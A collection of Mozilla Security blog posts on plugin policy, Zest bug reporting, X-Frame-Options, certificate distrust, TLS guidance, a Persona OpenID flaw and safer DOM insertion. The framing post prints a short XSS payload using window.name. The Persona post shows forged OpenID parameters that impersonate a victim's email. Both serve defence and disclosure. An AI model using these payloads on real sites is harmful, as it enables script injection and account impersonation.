Update on Plugin Activation

Chad Weiner

20

To provide a better and safer experience on the Web, we have been working to move Firefox away from plugins.

After much testing and iteration, we determined that Firefox would no longer activate most plugins by default and instead opted to let people choose when to enable plugins on sites they visit. We call this feature in Firefox click-to-play plugins.

We strongly encourage site authors to phase out their use of plugins. The power of the Web itself, especially with new technologies like emscripten and asm.js, makes plugins much less essential than they once were. Plus, plugins present real costs to Firefox users. Though people may not always realize it, we know plugins are a significant source of poor performance, crashes and security vulnerabilities.

Developers will increasingly find what they need in the Web platform, but we also recognize that it will take some time for them to migrate to better options. Also, we know there are plugins that our users rely on for essential tasks and we want to provide plugin authors and developers with a short-term exemption from our default click-to-play approach. Today, we’re announcing the creation of a temporary plugin whitelist.

Any plugin author can submit an application to be considered for inclusion on the whitelist by following the steps outlined in our plugin whitelist policy. Most importantly, we are asking for authors to demonstrate a credible plan for moving away from NPAPI-based plugins and towards standards-based Web solutions.

Today marks the beginning of an application window that will run until March 31, 2014. Any plugin author’s application received before the deadline will be reviewed and processed before click-to-play is activated by default in Firefox. Whitelisted status will be granted for four consecutive Firefox releases and authors may reapply for continued exemption as the end of the grace period draws near.

Our vision is clear: a powerful and open Web that runs everywhere without the need for special purpose plugins. The steps outlined here, will move us towards that vision, while still balancing today’s realities.

- Chad Weiner, Director of Product Management

Mozilla Security @ BSidesVancouver and CanSecWest

yboily

This year Mozilla will be sponsoring BSidesVancouver, a free community oriented event on March 10th & 11th in Vancouver, BC. This event is very much in the spirit of the Mozilla community and mission, and several of our security team members will be attending both BSidesVancouver and CanSecWest.

In addition to our team members attending the event, Jeff Bryner and Curtis Koenig will be speaking at the event about some aspects of the security processes and technologies that Mozilla uses and has built. If you are going to be at these events and would like to connect with us at BSidesVancouver or CanSecWest, send us a message at security@mozilla.org, or reach out to us on Twitter (@mozsec).

Reporting Web Vulnerabilities to Mozilla using Zest

Simon Bennetts

Overview

We always want to hear about potential vulnerabilities in our software, and have a long running Bug Bounty program to reward those who find serious security bugs.

However we sometimes receive bug notifications for vulnerabilities in our websites that are difficult to reproduce.

This is one of the reasons why we developed Zest: a security scripting language.

We would like to encourage everyone to submit vulnerability reports for server side web applications using Zest. There are plans for Zest to also handle client side vulnerabilities in the future.

Introducing Zest

Zest is an experimental specialized scripting language (also known as a domain-specific language) developed by the Mozilla security team and is intended to be used in web oriented security tools.

Zest scripts are defined in JSON, but they are designed to be represented visually in security tools.

Zest is completely free, open source and can be included in any tool whether open or closed, free or commercial.

Creating a simple Zest script using ZAP

To demonstrate how to create a Zest script we will use the OWASP Zed Attack Proxy (ZAP) which has built in support for Zest.

ZAP is an intercepting proxy, so you will need to configure your browser to proxy through ZAP. Details of how to do this are included in the ZAP help file, but if you are unsure of how to do this then you can also use Plug-n-Hack as described in the next session, as this will configure your browser for you.

The latest version of the Zest add-on for ZAP provides a toolbar button for quickly recording Zest scripts:

If this button is not shown then click on the “Manage Add-ons’ button on the tool bar (the 3 stacked blocks), click the ‘Check for updates’ button and update the Zest add-on.

Note that while Zest is included with ZAP, there is a known problem whereby Zest support can get removed from ZAP after an update, so if Zest is not included in the list of installed add-ons then select the Marketplace tab, find and select the Zest add-on and install it from there. In either case you should restart ZAP.

Clicking on the “Record a new Zest script…” button will open a dialog for creating a new Zest script. You only need give the script a title, but if you also select (or type) a prefix from the pull down list of sites you have already accessed then ZAP will only record requests with that prefix. The toolbar button will turn red to indicate you are recording and stay pressed.

Now use your browser to reproduce the server side vulnerability that you wish to report.

When you have finished click the toolbar button again to stop recording. The button will turn black.

If you now look at ZAP you should see a graphical representation of the script you have just recorded in the script in the ‘Scripts’ tab and the JSON representation in the ‘Script Console’ tab:

Creating a simple Zest script using ZAP and PnH

If you are new to ZAP then an alternative approach is to use Plug-n-Hack (PnH) another initiative from the Mozilla Security Team, and covered by another blog post.

To configure Firefox to use ZAP just click on the ‘Plug-n-Hack’ button on the ZAP ‘Quick Start’ tab:

Install the Plug-n-Hack Firefox Add-on and accept all of the dialogs. Note that we recommend that you use a separate Firefox profile for security testing.

Your browser should now be proxying via ZAP – try visiting some sites and verify that they appear in the ZAP ‘History’ tab.

You can now record a Zest script as above, but you can also control both PnH and ZAP via the Firefox Developer Toolbar.

Use ‘Shift F2′ to access the Developer Toolbar and then type ‘zap’ – you should see a list of commands like:

To record a Zest script in ZAP select (or type) the following command:

zap record on global

Now use your browser to reproduce the server side vulnerability that you wish to report.

When you have finished select (or type) the following command:

zap record off global

The Zest script will now be visible in the ‘Scripts’ tab and the JSON representation in the ‘Script Console’ tab as above.

Reporting the bug

To report the issue please file a bug in bugzilla, clearly describing the problem as you understand it.

Check that your Zest script does not contain any personal data, then save it to disk using the ‘Save Script..’ button in the ‘Scripts’ tab.

This script includes the data that you sent and received in your browser while you were recording, which allows us to see exactly what you did and what the result was. This makes reproducing potential vulnerabilities much easier.

Attach this file, which contains the JSON version of your script, via the Web Bounty Form.

For more details about how to submit security bugs see the ‘Process’ section of the Bug Bounty page.

You can just attach the script as is, but you may also want to edit it before submitting it to us.

Editing Zest scripts in ZAP

You can double click on any Zest node in the tree and edit it. You can also right click on nodes to delete them. This means that you can easily remove requests that are unrelated to the problem you are reporting.

If you select a Zest Request node then the related request and response will be shown in the ZAP ‘Request’ and ‘Response’ tabs.

You can also redact strings in the responses that you dont want to include, for example session cookies and passwords.

To do this select the relevant request and then select the ‘Response’ tab.

Find and highlight the relevant string, right click on it and select ‘Redact Text…’

This will cause the a dialog to be shown which allows you to specify the replacement string (default 5 ‘block’ characters) and an option to ‘Apply to all current requests’ which will cause the string to be replaced everywhere it appears in the script.

Running Zest scripts in ZAP

You can run Zest scripts in ZAP via the ‘Run’ button in the ‘Script Console’ tab.

Note that this is only enabled for ‘stand alone’ scripts – ZAP supports many other types of scripts which are integrated with ZAP features like the active scanner and therefore cannot be run independently.

When you run your script you will see the requests and responses shown in the ‘Zest Results’ tab.

You may see that some requests are flagged as failing.

This is because by default ZAP adds 2 assertions to each request – these check that the status code matches and that the response length is the same as before, plus or minus 2%. You can remove or change these assertions and add new ones if you like, all via right click menus.

You can compare new results with the previous ones by right clicking the request in the ‘Zest results’ tab and selecting ‘Zest: Compare with original response’:

Creating Advanced Zest Scripts in ZAP

You can add new requests to a Zest script by right clicking on any request in ZAP and selecting ‘Add to Zest Script’:

Zest supports other types of statements, including:

  • Conditionals
  • Loops
  • Assignments
  • Actions
  • Controls

These can all be added via right clicking on the Zest tree nodes:

These statements allow very powerful scripts to be created quickly and easily.

ZAP also adds useful features, such as automatically adding assign statements to handle any anti CSRF tokens if detects.

For more information about these statements see the Zest pages on MDN.

Demo

I demoed Zest at AppSec USA in November 2013, and the full video of my talk is available on YouTube. The Zest part of the talk starts at 23:47.

Feedback

Zest is still at an early stage of development and all constructive feedback is very welcome.

Anyone can contribute to the onward development of Zest, and teams or individuals who develop security tools are especially welcome to join and help shape Zest’s future.

The Zest code is on GitHub and there is a Google Group for discussing everything about Zest.

On the X-Frame-Options Security Header

Frederik Braun

7

A few weeks ago, Mario Heiderich and I published a white paper about the X-Frame-Options security header. In this blog post, I want to summarize the key arguments for settings this security header in your web application.

X-Frame-Options is an optional HTTP response header that was introduced in 2008 and found its first implementation in Internet Explorer 8. Setting this header in your web application defines if it works within a frame element (e.g., iframe). The syntax for this header provides three options, ALLOW-FROM, DENY or SAMEORIGIN. Not sending this header implies allowing frames in general. ALLOW-FROM, however, allows whitelisting a specific origin. The opposite is, of course, DENY which means that no website is ever allowed to display your website in a frame. A common middle ground is to send SAMEORIGIN. This means that only websites of the same origin may frame it.

This blog post will highlight some attacks than can be thwarted by forbidding the framing of your document. First of all, Clickjacking. This term has gained major attention in 2008 and includes a multitude of techniques in which an evil web page can secretly include yours in a frame. But the author of this evil website will make your website transparent and present buttons on top of it. Anyone visiting this evil page will then click on something seemingly unrelated, which will actually result in mouse clicks in your web application.

A wide class of attacks on other websites leverage missing security features in the browser. Most modern browsers provide hardened security mechanisms that may easily thwart problems with content injections. The problem lies, as so often, in backwards compatibility. The most recent browser versions are obviously more secure than the previous ones. But when somebody frames your website, they can tell it to run in a compatibility mode. This feature only applies to Internet Explorer, but it will bring back the vintage rendering algorithms from IE7 (2006). In Internet Explorer, the document mode is inherited from the top window to all frames. If the evil websites runs in IE7 compatibility mode, then so does yours! This is an example of how IE7 compatibility can be triggered in any website:

<meta http-equiv="X-UA-Compatible" content="IE=7" />

If your website would not allow to be framed, your IE users were not at risk.

Another technique for possible attackers comes with window.name. This attribute of your browsing window (a tab, a popup and a frame are all windows in JavaScript’s sense) can be set by others and you cannot prevent it. The implications of this are manifold, but just for the sake of Cross-Site-Scripting (XSS) attacks it may make things for an attacker much easier. Sometimes, when an attacker is able to inject and execute scripts on your web page, he might be hindered by a length restriction. Say, for example, your website does not allow names that exceed 80 characters. Or messages that must not exceed 140. The window.name property can help bypassing these restriction in a very easy way. The attacker can just frame your website and give it a name of his liking, by supplying it in the frame’s name attribute. The JavaScript he will then execute can be as short as <svg/onload=eval(name)>, which means that it will execute the JavaScript specified in the name attribute of the frame element.

These and many other attacks are possible if you allow your web page to be displayed in a frame. Just recently, Isaac Dawson from Veracode has published a report about security headers on the top 1 million websites, which shows, that only 30,000 of them currently supply this header. However, the fact that many other sites are vulnerable to these sort of attacks is not a good reason to leave your website unprotected. You can easily address many security problems by just adding this simple header to your web application right away: If you’re using Django, check out the XFrameOptionsMiddleware. For NodeJS applications, you can use the helmet library to add security headers. If you want to set this header directly from within Apache or nginx, just take a look at the X-Frame-Options article on MDN.

Revoking Trust in one ANSSI Certificate

kwilson

16

Last week, Mozilla was notified that an intermediate certificate, which chains up to a root included in Mozilla’s root store, was loaded into a man-in-the-middle (MITM) traffic management device. It was then used, during the process of inspecting traffic, to generate certificates for domains the device owner does not legitimately own or control. While this is not a Firefox-specific issue, to protect our users we are a updating the certificate store of Firefox in order to dis-trust these certificates. The Certificate Authority (CA) has told us that this action was not permitted by their policies and practices, and they have revoked the intermediate certificate that signed the certificate for the traffic management device.

Issue

ANSSI (Agence nationale de la sécurité des systèmes d’information) is the French Network and Information Security Agency, a part of the French Government. ANSSI (formerly known as DCSSI) operates the “IGC/A” root certificate that is included in NSS, and issues certificates for French Government websites that are used by the general public. The root certificate has an Issuer field with “O = PM/SGDN”, “OU = DCSSI”, and “CN = IGC/A”.

A subordinate CA of ANSSI issued an intermediate certificate that they installed on a network monitoring device, which enabled the device to act as a MITM of domains or websites that the certificate holder did not own or control. Mozilla’s CA Certificate Policy prohibits certificates from being used in this manner when they chain up to a root certificate in Mozilla’s CA program.

Impact

An intermediate certificate that is used for MITM allows the holder of the certificate to decrypt and monitor communication within their network between the user and any website without browser warnings being triggered. An attacker armed with a fraudulent SSL certificate and an ability to control their victim’s network could impersonate websites in a way that would be undetectable to most users. Such certificates could deceive users into trusting websites appearing to originate from the domain owners, but actually containing malicious content or software.

We believe that this MITM instance was limited to the subordinate CA’s internal network.

Status

Mozilla is actively revoking trust of the subordinate CA certificate that was mis-used to generate the certificate used by the network appliance. This change will be released to all supported versions of Firefox in the updates this week.

Additional action regarding this CA will be discussed in the mozilla.dev.security.policy forum.

End-user Action

We recommend that all users upgrade to the latest version of Firefox. Firefox 26 and Firefox 24 ESR both contain the fix for this issue, and will be released this week.

Credit

Thanks to Google for reporting this issue to us.

Kathleen Wilson
Module Owner of Mozilla’s CA Certificates Module

Navigating the TLS landscape

Julien Vehent

1

A few weeks ago, we enabled Perfect Forward Secrecy on https://www.mozilla.org [1]. Simultaneously, we published our guidelines for configuring TLS on the server side. In this blog post, we want to discuss some of the SSL/TLS work that the Operations Security (OpSec) team has been busy with.

For operational teams, configuring SSL/TLS on servers is becoming increasingly complex. BEAST, LUCKY13, CRIME, BREACH and RC4 are examples of a fast moving security landscape, that made recommendations from a only few months ago already obsolete.

Mozilla’s infrastructure is growing fast. We are adding new services for Firefox and Firefox OS, in addition to an ever increasing number of smaller projects and experiments. The teams tasked with deploying and maintaining these services need help sorting through known TLS issues and academic research. So, for the past few months, OpSec has been doing a review of the state-of-the-art of TLS. This is in parallel and complementary to work by the Security Engineering team on cipher preferences in Firefox. The end goal being to support, at the infrastructure level, the security features championed by Firefox.

We published our guidelines at https://wiki.mozilla.org/Security/Server_Side_TLS. The document is a quick reference and a training guide for engineers. There is a strong demand for a standard ciphersuite that can be copied directly into configuration files. But we also wanted to publish the building blocks of this ciphersuite, and explain why a given cipher is prefered to another. These building blocks are the core of the ciphersuite discussion, and will be used as references when new attacks are discovered.

Another important aspect of the guideline is the need to be broad, we want people to be able to reach https://mozilla.org and access Mozilla’s services from anywhere. For this reason, SSLv3 is still part of the recommended configuration. However, ciphers that are deprecated, and no longer needed for backward compatibility are disabled. DSA ciphers are included in the list as well, even though almost no-one uses DSA certificates right now, but might in the future.

At the core of our effort is a strong push toward Perfect Forward Secrecy (PFS) and OCSP stapling.

PFS improves secrecy in the long run, and will become the de-facto cipher in all browsers. But it comes with new challenges: the handshake takes longer, due to the key exchange, and a new parameter (dhparam/ecparam) is needed. Ideally, the extra-parameter should provide the same level of security as the RSA key does. But we found that old client libraries, such as Java 6, are not compatible with larger parameter sizes. This is a problem we cannot solve server-side, because the client has no way to tell the server which parameter sizes it supports. As a result, the server will start the PFS handshake, and the client will fail in the middle of the handshake. Without a way for the handshake to fall back and continue, we have to use smaller parameter sizes until old libraries can be deprecated.

OCSP stapling is a big performance improvement. OCSP requests to third party resolvers block the TLS Handshake, directly impacting the user’s perception of page opening time. Recent web servers can now cache the OCSP response and serve it directly, saving the round trip to the client. OCSP stapling is likely to become an important feature of Browsers in the near future, because it improves performances, and reduces the cost of running worldwide OCSP responders for Certificate Authorities.

OpSec will maintain this document by keeping it up to date with changes in the TLS landscape. We are using it to drive changes in Mozilla’s infrastructure. This is not a trivial task, as TLS is only one piece of the complex puzzle of providing web connectivity to large websites. We found that very few products provide the full set of features we need, and most operating systems don’t provide the latest TLS versions and ciphers. This is a step forward, but it will take some time until we provide first class TLS across the board.

Feel free to use, share and discuss these guidelines. We welcome feedback from the security and cryptography communities. Comments can be posted on the discussion section of the wiki page, submitted to the dev-tech-crypto mailing list, posted on Bugzilla, or in #security on IRC. This a public resource, meant to improve the usage of HTTPS on the Internet.

[1] bug 914065

Learning From a Recent Security Vulnerability in Persona

Lloyd Hilaiel

The purpose of our “Bug Bounty Program” is to encourage contributors to test and experiment with our code for the purposes of improving its functionality, security and robustness. Through this program we were recently alerted to a potential security flaw in one of our web services products, Persona.

In short, the issue reported could have allowed an attacker to impersonate any gmail.com or yahoo.com user on a website that supports Persona.  We have no evidence that it was exploited, and the issue has been resolved in production.  You can read a summary of the timeline in our recent disclosure.

Background: Persona and Identity Bridging

 

To understand the vulnerability, a little background on Persona is required:  Persona is a federated protocol which allows a user to verify their ownership of an email address by directly authenticating with their email provider.

If a user’s email provider does not support Persona, Mozilla can temporarily act as a trusted third party and vouch for the user. Mozilla will only vouch for a user if they can prove ownership of their email address, often by clicking a confirmation link mailed to that address. To streamline this process, Mozilla recently introduced a feature known as “Identity Bridging.” Bridging allows Mozilla to use existing public APIs, like OAuth or OpenID, to verify a user’s identity directly in the browser, without needing to send a confirmation email.

You can learn more about Identity Bridging in the original announcement. Generally, bridges are designed as a temporary measure. They allow Mozilla to deliver a streamlined login experience in advance of email providers supporting Persona themselves. Currently, Mozilla operates two bridges, one for Google and one for Yahoo users, both based on OpenID.

When logging into a website, Persona prompts the user to type an email address. Persona then performs discovery against the email’s domain to determine if the given email provider supports Persona.

If so, the user is sent directly to the provider to authenticate. If not, the user is sent to Mozilla’s fallback.

The fallback maintains a list of email domains and associated identity bridges. If a bridge is available, the user is sent to that bridge to authenticate. If not, Mozilla sends the user a confirmation email to verify ownership of the address.

Authenticating at a bridge occurs as a normal OpenID transaction:

  1. The bridge redirects users to the OpenID endpoint of the respective provider, requesting confirmation of ownership of an email.
  2. Subsequent to user interaction, the user is redirected back to the bridge with information supplied by the email provider in GET parameters.
  3. Online server-server verification of the authenticity of the request parameters is performed.
  4. Once verified, the user’s email address is considered confirmed, and the bridge issues a certificate which allows the user to assert ownership in a separate offline operation.

 

What Went Wrong?

 

The flaw that was discovered was in step #4 above.  Using OpenID to verify a user’s ownership of an email address is tricky process.  OpenID Attribute Exchange is the standard used that allows an email provider (an identity provider or IdP) to encode arbitrary attributes (such as email addresses) in the GET parameters of the URL of the website using OpenID (the relying party, or RP).  OpenID authentication further allows the IdP to provide a signature that covers a subset of the returned values.

The vulnerability could have allowed a malicious user to trick Persona into trusting unsigned parameters. To demonstrate the nature of related exploits, let’s explore a valid response and associated, simplified attacks:

 

A Valid OpenID Provider Response

 

To begin, in order to successfully confirm ownership of an email address via OpenID, one must verify that the OpenID endpoint is authoritative for the email in question.  For gmail.com addresses, Google is authoritative – for yahoo.com addresses, Yahoo is authoritative.

Once you’ve identified the correct endpoint for the email in question, the simplified example below (many required fields are removed) demonstrates a valid verification response:

  openid.op_endpoint: https://www.google.com/accounts/o8/ud
  openid.signed: op_endpoint,ns.ext1,ext1.mode,ext1.type.email,ext1.value.email
  openid.sig: <base 64 encoded signature>
  openid.ns.ext1: http://openid.net/srv/ax/1.0
  openid.ext1.mode: fetch_response
  openid.ext1.type.email: http://axschema.org/contact/email
  openid.ext1.value.email: example@gmail.com

In this response, the openid.sig parameter contains a signature that covers the fields enumerated in the openid.signed parameter.  Included in the signature are the openid.ext1 fields, which contain the email address of the user at Gmail.  Popular OpenID providers provide a service that allows online validation of signatures. However verification of a signature is not enough, and many popular OpenID libraries may appear deceptively simple.

To explore the nature of data validation required, let’s walk through a couple possible attacks.

 

Attack #1: Unsigned Email Attribute

 

Consider the following hypothetical return parameters from the IdP:

  openid.op_endpoint: https://www.google.com/accounts/o8/ud
  openid.signed: op_endpoint
  openid.sig: <base 64 encoded signature>
  openid.ns.ext1: http://openid.net/srv/ax/1.0
  openid.ext1.mode: fetch_response
  openid.ext1.type.email: http://axschema.org/contact/email
  openid.ext1.value.email: example@gmail.com

This set of response data has a valid signature, but the signature does not cover the email address returned by the IdP. Many popular OpenID libraries will return a response to calling code that is identical, regardless of whether return attributes are signed.  This would allow an attacker to generate a valid OpenID response which does not include an email address, and then append their own claimed email address.  This simple attack combined with behavior common in OpenID libraries can lead to vulnerabilities.

 

Attack #2: Data Extraction Flaws

 

Depending on the RP’s OpenID implementation, it’s possible that an attacker can spoof an email address despite the presence of expected values that are valid and signed.  Consider the following:

  openid.ns.foo: http://openid.net/srv/ax/1.0
  openid.foo.mode: fetch_response
  openid.foo.type.email: http://axschema.org/contact/email
  openid.foo.value.email: victim@gmail.com
  openid.op_endpoint: https://www.google.com/accounts/o8/ud
  openid.signed: op_endpoint,ns.ext1,ext1.mode,ext1.type.email,ext1.value.email
  openid.sig: 
  openid.ns.ext1: http://openid.net/srv/ax/1.0
  openid.ext1.mode: fetch_response
  openid.ext1.type.email: http://axschema.org/contact/email
  openid.ext1.value.email: example@gmail.com

In this case, there is a proper signed email present in the response, however an unsigned email also precedes it.  Online verification will succeed, and depending on how value extraction is implemented, this might be enough to cause the incorrect (unsigned) email to be extracted and returned to calling code, resulting in unauthorized access to victim@gmail.com‘s account.  In a popular OpenID implementation we found a lack of rigor in value extraction that could lead to vulnerabilities of this nature.

 

How Can Others Avoid These Pitfalls?

 

The simplified attacks in this post give you a flavor of the attention to detail required when using OpenID to confirm email ownership.  The same cautions apply to any sensitive information that you rely on that is returned from OpenID.

Our suggestions are twofold:

For library authors: Go the extra mile.  If you perform extraction of values returned by the IdP, perform rigorous validation, and expose the trust level of the return value.  For instance, in JavaScript, rather than returning an email property,  scope that property under an .unsigned or .untrusted namespace.  Make it blindingly obvious what values are, and are not, trustworthy.

For site owners using OpenID:  Give your implementation a deep look.  Ensure that identifying values are signed, types are as you expect, and parsing is rigorous.  For the IdPs that you use, research their suggested best practices.

 

Parting Thoughts

 

This was a serious vulnerability in Persona, however, our evidence indicates it was addressed before users were affected.  Moving forward, we will be conducting a review of the bridging code and the third-party libraries it uses, and our Bug Bounty program will continue to be a vehicle for researches to disclose vulnerabilities in our critical services. Finally, we will continue to address discovered vulnerabilities with all due effort, and openly and responsibly disclose them.

Bug Bounty Program Finds and Helps Resolve Security Vulnerability in Persona

mcoates

The purpose of our “Bug Bounty Program” is to encourage contributors to test and experiment with our code for the purposes of improving its functionality, security and robustness. Through this program we were recently alerted to a potential security flaw in one of our web services products.

Issue

On Tuesday, September 24th Mozilla was notified by a security researcher of a vulnerability within the Persona service that could potentially have allowed an attacker to authenticate to a Persona enabled website using the identity of an existing gmail or yahoo account.

As of Tuesday, October 1st, we’ve deployed updates to Persona to fully address this security concern. We also reviewed available log data from Sept 10 through October 2nd and confirmed that this flaw has not been used to target any users.

Impact

The vulnerability could have allowed a malicious attacker to authenticate to a Persona enabled website using the identity of an existing gmail or yahoo account.

Note: This issue only impacted the Persona service and sites that implement Persona. This vulnerability has no bearing on the security of a user’s gmail or yahoo email service.

Status

Mozilla immediately investigated and tested patches to address this issue. Initial patches to Persona were deployed on Friday, September 27th and additional patches for an identified edge case were deployed on Tuesday, October 1st.

The vulnerability that led to this issue was created by incorrect assumptions of behavior and security with two third party libraries. We’ve captured these details more fully in a technical post on the issue authored by Lloyd Hilaiel.

Credit for discovery of this issue goes to
Daniel Fett, Ralf Kuesters, and Guido Schmitz,
researchers at the Chair of Information Security and Cryptography,
University of Trier, Germany.

HITBSecConf HackWeekDay 2013

Paul Theriault

HITBSecConf HackWeekDay 2013

Mozilla is proud to be once again sponsoring HackWeekDay at the Hack-in-the-Box security conference in Malaysia in October. The event is a chance for developers – both students and professional – to come together and prototype new apps and features for Firefox OS – security-related or otherwise. We want to build on the already strong community in the region and encourage the open-source community to support the future of the mobile web.

For details of the prizes on offer and how to get involved, see the HackWeekDay page on the HITB website.

What are we hoping to achieve?

We want you to help push the Firefox OS platform forward. This competition is being sponsored by the security team at Mozilla but you can hack on any app that is interesting to you. And not just apps – we would love to see people developing new features for Firefox OS itself. A group of Mozillians will be there to help developers test their entries on Firefox OS devices and award prizes (including Firefox OS phones!)

How can people get prepared?

Interested developers who want to get started should get familiar with how to develop Apps for Firefox OS. Download the simulator, and make a basic app – this tutorial provides the basics of building apps for Firefox OS.

Got the basics down? Have a read of this page for tips on how to make fast mobile apps – this is critical for mobile and even more so on Firefox OS which targets more affordable, and therefore, lower-powered handsets.

Feeling strong with Apps, or just looking for inspiration? Dive into the Firefox OS front-end code. Everything the user sees with Firefox OS is actually written in the same web technologies used for Apps: HTML, JavaScript and CSS. Exploring the Firefox OS front-end, code-named  “Gaia“, is a great way to get a deeper understanding of the platform.

If you want to develop on Firefox OS itself, see the Hacking on Gaia page on MDN.

What are we looking for in the entries?

  • Prototypes which effectively demonstrate a new or interesting feature
  • Innovative use of new Web APIs
  • High quality execution (especially on the constraints of mobile)
  • Increase the security and privacy of Firefox OS users

What about others who can’t attend the conference?

  • Make apps for the Mozilla marketplace
  • Volunteer to help Mozilla security team on Firefox OS (or anything else) (come find us on irc://irc.mozilla.org/security or email security@mozilla.org)

Will the community be there?

Yes! Mozilla Malaysia is planning a presence at the event.

Introducing html2dom, an alternative to setting innerHTML

Frederik Braun

1

Having spent significant time to review the source code of some Firefox OS core apps, I noticed that a lot of developers like to use innerHTML (or insertAdjacentHTML). It is indeed a useful API to insert HTML from a given string without hand-crafting objects for each and every node you want to insert into the DOM.
The dilemma begins however, when this is not a hardcoded string but something which is constructed dynamically. If the string contains user input (or something from a malicious third-party – be it app or website), it may as well insert and change application logic (Cross-Site Scripting): The typical example would be a <script> tag that runs code on the attacker’s behalf and reads, modifies or forwards the current content to a third-party. CSP, which we use in Firefox OS, can only mitigate some of these attacks, but certainly not all.

Using innerHTML is bad (Hint: DOM XSS)

What’s also frustrating about these pieces of code is that analyzing it requires you to manually trace every function call and variable back to its definition to see whether it is indeed tainted by user input.

With code changing frequently those reviews don’t really scale. One possible approach is to avoid using innerHTML for good. Even though this idea sounds a bit naive, I have dived into the world of automated HTML parsing and code generation to see how feasible it is.

Enter html2dom

For the sake of experimentation (and solving this neatly self-contained problem), I have created html2dom. html2dom is a tiny library that accepts a HTML string and returns alternative JavaScript source code. Example:

<p id="greeting">Hello <b>World</b></p>

Will yield this (as a string).

var docFragment = document.createDocumentFragment();
// this fragment contains all DOM nodes
var greeting = document.createElement('P');
greeting.setAttribute("id", "greeting");
docFragment.appendChild(greeting);
var text = document.createTextNode("Hello ");
greeting.appendChild(text);
var b = document.createElement('B');
greeting.appendChild(b);
var text_0 = document.createTextNode("World");
b.appendChild(text_0);

As you can see, html2dom tries to use meaningful variable names to make the code readable. If you want, you can try the demo here. Now we could also just replace the "World" string with a JavaScript variable. It cannot do any harm as it is always rendered as text.

When it comes to HTML parsers, you also don’t want to write your own.

Luckily, there are numerous very useful APIs which helped making the development of html2dom fairly easy. First there is the DOMParser API which took care about all HTML parsing. Using the DOM tree output, I could just iterate over all nodes and their children to emit a specific piece of JavaScript depending on its type (e.g., HTML or Text). For this, the nodeIterator turned out really valuable.

I have also written a few unit tests, so if you want to start messing with my code, I suggest you start by checking them out right away.

Known Bugs & Security

This tool doesn’t really save you from all of your troubles. But if you can, make sure that the user input is always somewhere in a text node, then html2dom can prevent you from a great deal of harm. Give it a try!

On the horizon

I have also been looking at attempts to rewrite potentially dangerous JavaScript automatically. This is at an early stage and still experimental but you can look at a prototype here